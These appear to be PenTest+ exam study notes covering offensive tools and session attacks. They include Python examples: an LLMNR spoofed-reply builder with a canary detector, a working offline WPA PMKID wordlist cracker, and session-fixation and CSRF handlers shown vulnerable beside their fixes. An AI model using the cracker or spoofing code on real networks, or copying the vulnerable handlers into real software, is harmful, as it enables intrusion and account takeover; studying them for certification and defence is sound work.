Pentest+ Tools

Tools to know for PenTest+ and what they do.
Table of Contents
┌──❀̥˚───────────────────────────────────────────────❀̥˚─┐
Tools
✧. ┊ Tools ✧ LAN Attacks ✧ WLAN Attacks ✧ WLAN Attack for Password ✧ Mobile Tools ✧ System Hacking ✧ Remote Access Tools ┊ .✧
Tools
ೃ⁀➷ Hydra, Medusa, BruteSpray
Online (network login) password brute-forcing tools. Hydra and Medusa try username/password lists against live services such as SSH, FTP, SMB, RDP and HTTP login forms; BruteSpray reads the services discovered in Nmap output and launches those brute-force attempts against them automatically. Noisy: expect account lockouts and log entries.
ೃ⁀➷ Metasploit
Security & penetration testing framework that allows mixing and matching scanners, exploits, and payloads.
ೃ⁀➷ Meterpreter
Most popular Metasploit payload (the program that runs on the target once it is compromised). Runs in memory and gives an interactive command interface on the target: file system, process, credential dumping, privilege escalation and pivoting commands.
ೃ⁀➷ msfvenom
Part of the Metasploit Framework that generates and encodes standalone payloads (shellcode, executables, scripts) for many platforms and architectures, including malicious app packages (APKs) for Android devices
ೃ⁀➷ Nikto
Open source web server scanner (shipped with Kali Linux) that runs comprehensive tests against web servers for known vulnerabilities, dangerous files, outdated software and misconfigurations. Not stealthy; it is easily spotted by an IDS or WAF
ೃ⁀➷ Mimikatz
Post-exploitation tool that extracts sensitive credentials from Windows memory (the LSASS process): plaintext passwords, NTLM hashes and Kerberos tickets. Typically needs local admin/SYSTEM and is flagged by most EDR products
LAN attacks
ೃ⁀➷ Impacket
Open source Python library and tool collection for working with Windows network protocols on a LAN (SMB, MSRPC, LDAP, Kerberos). Its example scripts can do NTLM and Kerberos authentication attacks, credential dumping (secretsdump), pass-the-hash remote execution (psexec, wmiexec), NTLM relaying (ntlmrelayx) and packet crafting/sniffing.
ೃ⁀➷ Responder
Kali Linux command line tool that poisons LLMNR, NetBIOS Name Service (NBT-NS) and mDNS name resolution requests: it answers queries for names no real host owns with its own address, so victims connect to it and hand over NTLMv2 challenge/response hashes (for cracking or relaying)
ೃ⁀➷ mitm6
IPv6 DNS hijacking tool. Windows hosts prefer IPv6 and request it by default, so mitm6 answers their DHCPv6 requests and sets itself as the DNS server, then redirects victims to attacker-controlled hosts (usually chained with Impacket's ntlmrelayx for relay attacks)
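The poisoning Responder performs, shown as a protocol exchange. This is an added example and not code from the original notes or from the Responder project: it builds an LLMNR query the way a Windows host would, builds the spoofed answer a poisoner sends back, parses it, and implements the standard detection check of querying a canary name that cannot exist on the LAN (only a poisoner will answer). All packet bytes are constructed inline and nothing is transmitted; the canary naming scheme and the attacker IP 10.0.0.66 are assumptions for the example.

```python
# Added example (not from the original notes or the Responder project):
# LLMNR query, poisoned reply, and a canary-based poisoner check.
import secrets
import struct

LLMNR_PORT = 5355          # LLMNR runs over UDP 5355 (multicast 224.0.0.252)
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(data: bytes, offset: int):
    """Decode labels starting at offset; return (name, offset after the terminator)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(name: str, txid: int) -> bytes:
    """LLMNR query: DNS-shaped header (flags 0, one question), then the question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_poisoned_reply(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner does: answer *any* queried name with its own address.
    Echoes the question and appends a single A record pointing at attacker_ip."""
    txid = struct.unpack("!H", query[:2])[0]
    name, off = decode_name(query, 12)
    question = query[12:off + 4]                       # name + qtype + qclass
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, one answer
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4) + rdata
    return header + question + answer


def parse_reply(reply: bytes):
    """Return (txid, queried name, [A-record IPs]) from an LLMNR response."""
    txid, _flags, _qd, an, _, _ = struct.unpack("!HHHHHH", reply[:12])
    name, off = decode_name(reply, 12)
    off += 4                                           # skip qtype/qclass
    ips = []
    for _ in range(an):
        _, off = decode_name(reply, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", reply[off:off + 10])
        off += 10
        if rtype == TYPE_A and rdlen == 4:
            ips.append(".".join(str(b) for b in reply[off:off + 4]))
        off += rdlen
    return txid, name, ips


def random_canary() -> str:
    """A hostname nobody has (assumed naming scheme): legitimate hosts stay silent."""
    return "canary-" + secrets.token_hex(4)


def detect_poisoner(canary: str, txid: int, reply: bytes):
    """Detection check: if anything answers our canary query with a matching
    transaction id, the answering address is a poisoner. Returns that IP or None."""
    r_txid, r_name, ips = parse_reply(reply)
    if r_txid == txid and r_name.lower() == canary.lower() and ips:
        return ips[0]
    return None


if __name__ == "__main__":
    canary, txid = random_canary(), 0x0042
    q = build_query(canary, txid)
    spoofed = build_poisoned_reply(q, "10.0.0.66")      # constructed attacker reply
    print("poisoner:", detect_poisoner(canary, txid, spoofed))
```

To run the check on a real segment, send `build_query(...)` to 224.0.0.252:5355 and feed whatever comes back to `detect_poisoner`; the same idea works for NBT-NS (UDP 137) with its own name encoding. The real fix is to disable LLMNR and NBT-NS by policy and enforce SMB signing so captured hashes cannot be relayed.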
WLAN attacks
ೃ⁀➷ Aircrack-ng
Wireless network security testing using command line tools to do wireless monitoring, attacking, testing, and password cracking.
ೃ⁀➷ Airmon-ng
Tool in the aircrack-ng suite that enables/disables monitor mode on wireless interface, or switch from managed to monitor mode
ೃ⁀➷ Airodump-ng
Tool in aircrack-ng suite that can capture 802.11 frames and use output to ID the MAC address of access points or victim client devices
ೃ⁀➷ Aireplay-ng
Tool in aircrack-ng suite that injects 802.11 frames. Its deauthentication attack kicks a client off the access point so that, when it reconnects, the WPA/WPA2 4-way handshake can be captured (with airodump-ng) and fed to aircrack-ng for offline password cracking
ೃ⁀➷ Kismet
Kali Linux tool that can capture packets, act as wireless IDS, and can preserve any caught handshake packets to try to crack password later
ೃ⁀➷ Wifite2
Wireless auditing tool to assess WLANs. Does a site survey, IDs active targets, lists known targets and hidden access points. Can do a WPS brute-force PIN attack, WPS Pixie Dust attack, WPA handshake capture and crack attempt, and WPA Pairwise Master Key Identifier (PMKID) crack attempt (the PMKID is taken from the first handshake message, so no connected client is needed)
ೃ⁀➷ Spooftooph
Tool that can spoof or clone Bluetooth device
ೃ⁀➷ WiGLE
Site dedicated to mapping and indexing access points
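How the PMKID crack attempt mentioned under Wifite2 works, as an added example (not code from the original notes or from the Wifite2 or aircrack-ng projects). The access point sends the PMKID in the first message of the 4-way handshake; it is derived from the PMK, which is derived from the passphrase and SSID, so a captured PMKID can be attacked offline against a wordlist without waiting for a client. The SSID, MAC addresses, passphrase and wordlist below are constructed for the example.

```python
# Added example (not from the original notes or any of the listed tools):
# WPA/WPA2-Personal PMK and PMKID derivation, plus an offline wordlist attack.
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): first 16 bytes."""
    data = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def crack_pmkid(target: bytes, ssid: str, ap_mac: str, sta_mac: str, wordlist):
    """Try each candidate passphrase; return the one whose PMKID matches, else None."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not candidate:
            continue
        if hmac.compare_digest(pmkid(wpa_pmk(candidate, ssid), ap_mac, sta_mac), target):
            return candidate
    return None


# Constructed sample "capture": values an attacker would read out of EAPOL message 1.
SAMPLE_SSID = "CorpGuest"
SAMPLE_AP_MAC = "00:11:22:33:44:55"
SAMPLE_STA_MAC = "66:77:88:99:aa:bb"
SAMPLE_PASSPHRASE = "Summer2024!"
SAMPLE_PMKID = pmkid(wpa_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_AP_MAC, SAMPLE_STA_MAC)
SAMPLE_WORDLIST = ["password", "letmein", "Welcome1", "Summer2024!", "CorpGuest123"]


def demo():
    return crack_pmkid(SAMPLE_PMKID, SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096-round PBKDF2 is the whole cost of the attack, which is why tools hand the captured PMKID to hashcat (mode 22000) on a GPU rather than cracking in Python. WPA3-SAE does not derive the PMK from the passphrase this way, so this attack does not apply to it.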
WLAN Attack for Password
ೃ⁀➷ Fern
Python-based (GUI) program to test wireless networks. Can recover WEP, WPS and WPA keys through dictionary attacks, brute force, session hijacking, replay attacks and man-in-the-middle attacks.
ೃ⁀➷ EAPHammer
Python-based toolkit in Kali for attacking WPA2-Enterprise 802.11a/n networks. Can launch karma attacks using an evil twin, steal RADIUS credentials (captures the EAP/MSCHAPv2 exchange from clients that do not validate the server certificate), conceal/cloak the SSID, perform captive portal attacks and capture AD credentials
ೃ⁀➷ MDK4
Linux-based 802.11 attack tool that can flood and disrupt rather than crack: beacon flooding (fake access points), authentication DoS, deauthentication/disassociation floods, EAPOL start/logoff floods and WIDS confusion attacks
Mobile Tools
ೃ⁀➷ Frida
Open source dynamic instrumentation toolkit. Injects JavaScript into a running process to hook functions, dump process memory, examine plaintext data as it is passed between functions, fuzz in-process, and bypass jailbreak/root detection or certificate pinning, etc.
ೃ⁀➷ Objection
Runtime mobile exploration toolkit for iOS and Android apps, built on Frida. Gives a command line for common tasks (dump keychain/keystore, list classes, bypass jailbreak/root detection and SSL pinning) without writing hooks by hand, and can also run custom Frida scripts
System Hacking
ೃ⁀➷ Empire
C2 (Command and Control) framework using PowerShell for post-exploitation tasks
ೃ⁀➷ Covenant
.NET C2 framework that shows attack surface of .NET
ೃ⁀➷ Mythic
C2 framework which is particularly good for MacOS
Remote Access Tools
ೃ⁀➷ Netcat
Command line utility to read from or write to TCP/UDP/Unix domain socket network connections. Can act as a simple proxy/relay, transfer files, launch executables (bind or reverse shells), test services/daemons, port scan, etc. Traffic is unencrypted.
ೃ⁀➷ Secure Shell (SSH)
Encrypted remote access protocol that replaces Telnet and rsh/rlogin. Used to securely issue commands and copy files over a network (scp/sftp), remotely manage servers and other devices, and tunnel/forward ports. Prefer key-based authentication and disable password logins where possible
ೃ⁀➷ rsh/rlogin
Legacy Unix/Linux remote shell commands that trust hosts and users listed in .rhosts or hosts.equiv, so you may not need to supply credentials. Can open a shell and give the ability to execute commands, but everything (including any password) crosses the network in cleartext; their presence on a host is itself a finding
└───❀̥˚───────────────────────────────────────────────❀̥˚┘
┌──❀̥˚───────────────────────────────────────────────❀̥˚─┐
Attacks
ೃ⁀➷ Session hijacking
Stealing a valid session credential (cookie/token) from a user's browser or traffic and impersonating that user
ೃ⁀➷ Session fixation
Impersonating a user using a session identifier the attacker already knows: the attacker plants the SID before the victim logs in (social engineering, a link or fake login page carrying the known SID), the victim authenticates, and the application keeps using that same SID. Prevented by issuing a new session ID on login
ೃ⁀➷ Session replay
Man in the middle with access to the user's authentication traffic, intercepting it and repeating (replaying) it later to authenticate as the user
ೃ⁀➷ Cross-site request forgery (XSRF/CSRF)
Attacker takes advantage of trust established between user and website. EX: trust in a user’s unexpired browser cookies AKA session riding, one-click attack
ೃ⁀➷ Server-side request forgery (SSRF)
Attacker takes advantage of trust established between server and resources the server can access
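The session fixation and CSRF entries above, as an added example (not code from the original notes): a minimal server-side session table with a vulnerable login that keeps whatever session ID the client presents beside the fixed version that rotates it, and a funds-transfer handler authorised by cookie alone beside one that also demands a per-session CSRF token. The session store, the `transfer_funds` action and the response strings are assumptions made for this example.

```python
# Added example (not from the original notes): session fixation and CSRF,
# each shown as the vulnerable handler beside its fix.
import hmac
import secrets


class SessionStore:
    """Minimal server-side session table: session id -> dict of attributes (assumed)."""

    def __init__(self):
        self.sessions = {}

    def new(self):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid


def login_fixation_vulnerable(store, sid, username, password_ok):
    """Vulnerable: keeps the session id the client presented (possibly one the
    attacker planted) and just marks it authenticated."""
    if sid not in store.sessions:
        sid = store.new()
    if password_ok:
        store.sessions[sid]["user"] = username
    return sid


def login_fixation_fixed(store, sid, username, password_ok):
    """Fixed: on successful authentication, discard the pre-login session id and
    issue a fresh one, so a planted id never becomes an authenticated session."""
    if not password_ok:
        return sid
    store.sessions.pop(sid, None)
    new_sid = store.new()
    store.sessions[new_sid]["user"] = username
    return new_sid


def issue_csrf_token(store, sid):
    """Per-session secret embedded in the site's own forms; a cross-site page cannot read it."""
    token = secrets.token_urlsafe(32)
    store.sessions[sid]["csrf"] = token
    return token


def transfer_funds_vulnerable(store, cookie_sid, amount):
    """Vulnerable: authorises on the cookie alone. A <form> or <img> on an attacker
    page is submitted by the victim's browser with that cookie attached automatically."""
    sess = store.sessions.get(cookie_sid)
    if not sess or not sess["user"]:
        return "401 not logged in"
    return f"200 sent {amount} as {sess['user']}"


def transfer_funds_fixed(store, cookie_sid, amount, form_token):
    """Fixed: also require the CSRF token from the request body, compared in constant time."""
    sess = store.sessions.get(cookie_sid)
    if not sess or not sess["user"]:
        return "401 not logged in"
    expected = sess.get("csrf")
    if not expected or form_token is None or not hmac.compare_digest(expected, form_token):
        return "403 csrf token mismatch"
    return f"200 sent {amount} as {sess['user']}"


if __name__ == "__main__":
    store = SessionStore()
    planted = store.new()                       # attacker obtains a sid, hands it to victim
    login_fixation_vulnerable(store, planted, "alice", True)
    print("attacker's planted sid is now alice's session:", store.sessions[planted]["user"])
    print("forged request succeeds:", transfer_funds_vulnerable(store, planted, 100))
```

Rotating the session ID at login is the fixation fix; the CSRF fix here is the synchroniser-token pattern, and in practice it is paired with `SameSite` cookies so the browser does not attach the cookie to cross-site form posts in the first place.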
└───❀̥˚───────────────────────────────────────────────❀̥˚┘